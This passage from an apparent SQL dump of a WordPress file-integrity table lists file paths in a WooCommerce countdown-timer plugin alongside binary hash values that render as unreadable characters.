V>G','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/CMB2_Options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')ck|F@g|','R9MnG:I7\Z5&WY0U^K\r','',0,'?'),('\">P^mƏX','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/CMB2_Options_Hookup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'07z&:tX','6G}49	o㓷g_!','',0,'?'),('E9fM}	','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/CMB2_Sanitize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b-:&L%$Z <','`t/REۗG\nUg:1M','',0,'?'),('Dao%^','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/CMB2_Show_Filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DQ:%R\ny','<S6fX)k^IbF(;wm9','',0,'?'),(':cTv|hJ','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/CMB2_Types.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0\Z~΅\'qW','[Xazh/y%dV7','',0,'?'),('6xW9&Ǚ\r','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/CMB2_Utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'rC>Y+=1','|EiHOt2H\Z*zPaK','',0,'?'),('!Eo=gN`','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/CMB2_hookup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\"mY5)','Vx*ھ$euk7Rk?f7','',0,'?'),('nqet?=`<','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/helper-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0q8/_','6zhu,vu3aBB*L','',0,'?'),('e	97;','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0?ho(7','Aũ`97}b>MHJHh|Fj','',0,'?'),('nG\01a','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/rest-api/CMB2_REST.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Iq1.<5&\n','`L-r WX^SP4nt?','',0,'?'),('ILW{]q%','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/rest-api/CMB2_REST_Controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V/nm:~pѮ\ZtB',', /we!HWgLeKEYִ','',0,'?'),('=y+xeo%*','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/rest-api/CMB2_REST_Controller_Boxes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϛ?4Bq','Wi\rwm[۰mH\ZQrnMy','',0,'?'),('r6[D&','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/rest-api/CMB2_REST_Controller_Fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D|p\0$CE','c>g(v=bepS\ru3','',0,'?'),('*\"$!Iu','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/shim/WP_REST_Controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7on','7t[*\'-Y-р]<','',0,'?'),('q9TilK6!`4','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','og1@',',d6UNu\\TD8Je','',0,'?'),('5\n&bL','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Checkbox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0\0|%','2kS#,\\ Vf	~sDTz','',0,'?'),(';g T!@','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Colorpicker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KYFSo1u','f[t۠UuaN̦b','',0,'?'),(':^K|+/','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.pSke^','&A8J*.}X~{,f !)#','',0,'?'),('A]0y\\G\n','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_File_Base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#\0?Msvd2ժl','^+[uJv{+VWH8)\Z2','',0,'?'),('1m~\"\Z\"զ','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_File_List.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e\"-$6\ZZZ','4C`\rR	4lT?PP[eOd(5R','',0,'?'),('Q5\\Ib','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Multi_Base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̆A5','m͐3knDʾU\'v','',0,'?'),('tnb+\nk','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Multicheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/iN\"','}>ϛ$^4|-v6','',0,'?'),('	i4}','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Oembed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4=ILnVr93g',';B_n60Mm\n/X}KK','',0,'?'),('pu{U\0aۜ','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Picker_Base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oN]Ϥ?W','	SbϤw/V!e]ڬ.d','',0,'?'),('Pb]=f','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Radio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'|օ6zܘM:*e{','Ww\0ؙ(De!K6g','',0,'?'),('̋`Ёsfmtp','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p&d:i','붶2s!<-#7۲?\\k<x','',0,'?'),('U@l(Zv','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Select_Timezone.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r=n\\o','+%B)Z<T\'iԻbz','',0,'?'),('@MIقi\Z','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Taxonomy_Base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W(yt3','@$\Z.p>be#v=Φζ\"Md','',0,'?'),('NC5\0Փ','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Taxonomy_Multicheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E\Z\r՟?,Y_N@','9vGC51~\0۱%@','',0,'?'),('z7Th','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Taxonomy_Multicheck_Hierarchical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i,(>J&','ڬ\'@1Wm:i\ZkuŔ','',0,'?'),('b/Uaqy\0;!##','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Taxonomy_Radio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n\ZY.Fy','89\0%\\KH@\\TJ۔>{\rV(+','',0,'?'),('`7cIф)','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Taxonomy_Radio_Hierarchical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>bn/p&M','ojn8`3PcpyXN#','',0,'?'),('zbBd8','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Taxonomy_Select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','utٰzP?\n1k','$G&y	Ѭ7*9+Eee|{','',0,'?'),('?BwAL.','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aXIoS\0Ƴ8T','\0Bg4V}.mVki','',0,'?'),('PU*\'b','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Text_Date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l\'pЕZ','Lc,2iNչP$;r7J\n!','',0,'?'),('MEwf\Z','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Text_Datetime_Timestamp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(?Sa','L(iO#_J:2o\0dz/','',0,'?'),('L\'|2bs','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Text_Datetime_Timestamp_Timezone.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W]\r5\n6,X','ieG)Cu\r		)-!<w\'\'*','',0,'?'),('l&Sc~1]v','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Text_Time.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t7thgV8','WA0Лj5vwu0Ά@P','',0,'?'),('.3t,҉ &Pv5','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ўj5~\rFe','<(Ҟ]`/ީzaL[','',0,'?'),('Lh!=$^','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Textarea_Code.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y{XqD \nOLR','\0ߎ$>oz1,Ӊ5aՁ1G','',0,'?'),('XLJ[޲J\"','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<Q\'.N>ybk','XIqub;AT','',0,'?'),(')~!8`@B','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/includes/types/CMB2_Type_Wysiwyg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ᨁ9أ','\"\nxϮ@쫃TzzG[leq','',0,'?'),('aQ','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H^6sݙKe','k~	UH\ZxPĀ<;X','',0,'?'),('y;*K2յ','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fcmo]L','~\Zw-&!8ۛ<\"ʀwW','',0,'?'),('T<<T5!','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/js/cmb2-wysiwyg.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n{&Fg?R	Ӻgʝ','ufE*+ }$b4Z','',0,'?'),('*sRM]:o]','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/js/cmb2.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e!fKE','!\"~R7N@/cvwŹ?).\nz#','',0,'?'),('j@X.6','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/js/cmb2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sg-Vp.8','d+7Ӽk4>,EPHf','',0,'?'),('+?ѐufs!\n','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/js/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0?ho(7','Aũ`97}b>MHJHh|Fj','',0,'?'),('t+nWĊ;[T','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/js/jquery-ui-timepicker-addon.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	r%bj',')H^\r_Bzsc H1:c8&|af','',0,'?'),('AR־ ','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/js/wp-color-picker-alpha.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?Pm)8Ӊ',',tklL%fI/GNբmj:','',0,'?'),('3ף6>e!0','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/js/wp-color-picker-alpha.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$=HO㢔','gl~ȗe1#ԫSP}=(6:niI8','',0,'?'),('\'Eg\r','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2/languages/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H^6sݙKe','k~	UH\ZxPĀ<;X','',0,'?'),('m25%]','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2-addons/conditional/cmb2-conditionals.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'\'|\0	}c','gޕȿN(v7Cb^In','',0,'?'),('y\0nk!˦0@','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2-addons/conditional/cmb2-conditionals.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LhUm)`','jRxDȽ;\r!ux|]һ','',0,'?'),('SUkyS&[b','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2-addons/conditional/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('ԐXg5a)V','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2-addons/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('StR.˝B','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2-addons/switch/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('-;$4+\r8\0','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2-addons/switch/switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Npn','cV>!VժĞ͆2[','',0,'?'),('!hS挍5%','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2-addons/switch/switch_metafield.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','65$jF4','g_>=OwPÏ}T慴݊Ws','',0,'?'),('H\'DNPӸx','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2-addons/switch/switch_metafield.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3d$ u \">',';eo[\r0]|~#x\ZpqX1ŋI','',0,'?'),('0Y<Ƽ[^z','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2-addons/tabs/CMB2-WCCT-Tabs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˶*,oM.v`4','ʈ\ZUݲsa37pFJ{r	','',0,'?'),('>o5','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2-addons/tabs/css/tabs.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m.S#c]T4_','QCډeȼ?u)&z$()u_&','',0,'?'),('Z!չ~=F','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2-addons/tabs/js/tabs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DʹLQD','͌RDJP7k\Z	MeNN(Ck','',0,'?'),('*R(9݌W^&;R','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/cmb2-countdown-meta-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' V}u(>+2LJ','=JԴWa|\Z!lJ!93eȵդ','',0,'?'),(',l1fm)','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('EdOp)/~','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/upsell/class-wcct-upsell.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ь-\rg9n\\~','\0]}!c%X#:~Z49.','',0,'?'),('j7_߈pdykX','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/wcct-admin-cmb2-support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iry&O`','].l{sGvK<ҕ)y','',0,'?'),('XML=?CP','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/wcct-admin-countdown-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c&^ǽg!VH','4#z]дvl|@頑TXO','',0,'?'),('nԐ&*߸*','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/wcct-post-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a_luGR','!?D/A$ާl~Zq:pk]R','',0,'?'),('VKXZTm','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/includes/xl-wcct-reports.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FD`','y걏Fy>_gx|,\ZV\n','',0,'?'),('>0:bS','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('l^k	c,qK{','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/views/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('p7]flçl','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/views/metabox-rules-rule-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\eԭ6O','H,x_(~:t Hy{>','',0,'?'),('l>+ĕ\'T','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/views/metabox-rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' h@%zp','yV%6S#x}\Z3zjơ','',0,'?'),('.R{+v[(','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/views/optin-temp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<\rč+V*','TW#q[c(̝O^$! WW]^','',0,'?'),('k[2߀T','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/admin/wcct-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',㦑.s\n','Zxزt@aprh֏ܺDOm>','',0,'?'),('LY&[s','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/css/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('iKYk>QUm[','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/css/wcct-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3GP߫+G','y2XDy&/	Z>v%VKh','',0,'?'),('a\ZFvk<','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/css/wcct_combined.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3GP߫+G','y2XDy&/	Z>v%VKh','',0,'?'),('ӳ&jlA QZ7<S|','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/css/wcct_combined.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Or$\ri:u','GPK0).rR4DG)','',0,'?'),('F5%\"dLRm!X','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/img/bar-capsule-animated.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٛ-:K)NJ','Ǌ*\0צ76J3Bø+uegL5','',0,'?'),('#\'_Nswc','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/img/bar-capsule-lines.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t\"\'rYn',',_~k煏dnnB4K|H`','',0,'?'),('P9:zL','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/img/bar-capsule.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tu7I;aaX]','l\"]FmQW\reЮ]Aød<','',0,'?'),('٥֔&.@rHE\Z','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/img/button_arrows.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=\0iL2','!mxADJ2K\"}D`','',0,'?'),(']QS\n\r\0','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/img/button_edge.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1M  \0jF','|*x\'`tB+jQ','',0,'?'),('!w\\GT@ ǭ=','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/img/button_ghost.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^pf囆D\\','Z	(\n~-z#b\":r.I}3S','',0,'?'),('-CZ\\\0oM*h?','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/img/button_more_rounded.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&Cr#pʱ:A','9l$%: ãdcx[0-n{*','',0,'?'),('̧Iu~%Tw4','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/img/button_rounded.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w+9Qi\rQ7w','Oh{*=R 0 #@?,','',0,'?'),('Fe޳&̵O7','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/img/button_shadow.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$j2+mx;@m','b쫩\0$l\Z/7_LCoZ','',0,'?'),('/jIEM\0=>!1','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/img/edge-rounded.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'NA]SN',':i(RF\"KW֓s\\έ','',0,'?'),('$ldu<VnL','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/img/edge-sharp.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~Unٸyq7	','53\Z9l(\nGU1#~','',0,'?'),('{|b\0݌D3','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/img/edge-smooth.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LyBab\',','ՠѨ;D#NvO䗰6n','',0,'?'),('$dDjPmP','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/img/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('!V1h~]x	h','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/img/timer_circle.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H5<t03m','Iu1){J{zӫkaIh[n1','',0,'?'),('~2̧i7','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/img/timer_ghost.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uJ18]R|','\rkԀnlu:\rCSl%4nbxg','',0,'?'),('yW^A','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/img/timer_square.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','طmu[B#CߺY','ʑjg\"4<|5e_@oQ','',0,'?'),('IrS\Z\Z@WY','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/img/timer_square_ghost.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R]i!^','?dE;f@Vz\0w\"','',0,'?'),('c9K_','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/img/timer_text.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-6yp^Y','c,g\Z=;!bc,Fof?','',0,'?'),('c&(x','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/img/timer_text_simple.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'8E.Wk5','H3A19dss,2^l','',0,'?'),('+|ud|:\Z','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('j!\'RI3!ap','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/js/humanized-time-span.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z仁\r6K',']fVaW߆\0;BZU','',0,'?'),('!v{bʼdo','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/js/humanized-time-span.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g%k͵','ATy\0+k^52Ĩ]0B','',0,'?'),('ج%X]!e&','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/js/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kD8cVg&J','k~	UH\ZxPĀ<;X','',0,'?'),('Aٰ	ֹ','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/js/jquery.countdown.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+đ\'VO\\','{\0Z.=E=|ZYy\Zt:','',0,'?'),('n\rS	r%Xf%','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/js/wcct-custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4)4IP=0:-','ɦ|Q^g|+Dam@D','',0,'?'),('`\'qD,tz','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/js/wcct-custom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h?j!Ss9','o$˗ENxf3T=VUd_e','',0,'?'),('?jBb_	','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/js/wcct-visible.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<lz?Yg,;/BBW','}%Scīh\n TF yRe','',0,'?'),('+!\"ф','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/js/wcct-visible.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U|4x_\Z{','qG0:F,m3&Bw̐BN;S','',0,'?'),('r~&Nb','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/assets/js/wcct_combined.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W=?\n_]','PaO%V\"aH>?/&!Wͧ,','',0,'?'),('ziU(\'p~Q','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/compatibilities/class-wcct-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$2J]JmTz',',38\'rePA@R̈`\\x{d5','',0,'?'),('PջcE','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/compatibilities/class-wcct-compatibilities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M0Ax(\0/','(f:U9[O[WMBdtKUA','',0,'?'),('\n3,TP<2T','wp-content/plugins/finale-woocommerce-sales-countdown-timer-discount/compatibilities/class-wcct-compatibility-google-feeds.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j\Zݿ&*Qb^h','f_%Rj*BU)M+','',0,'?'),('MQ~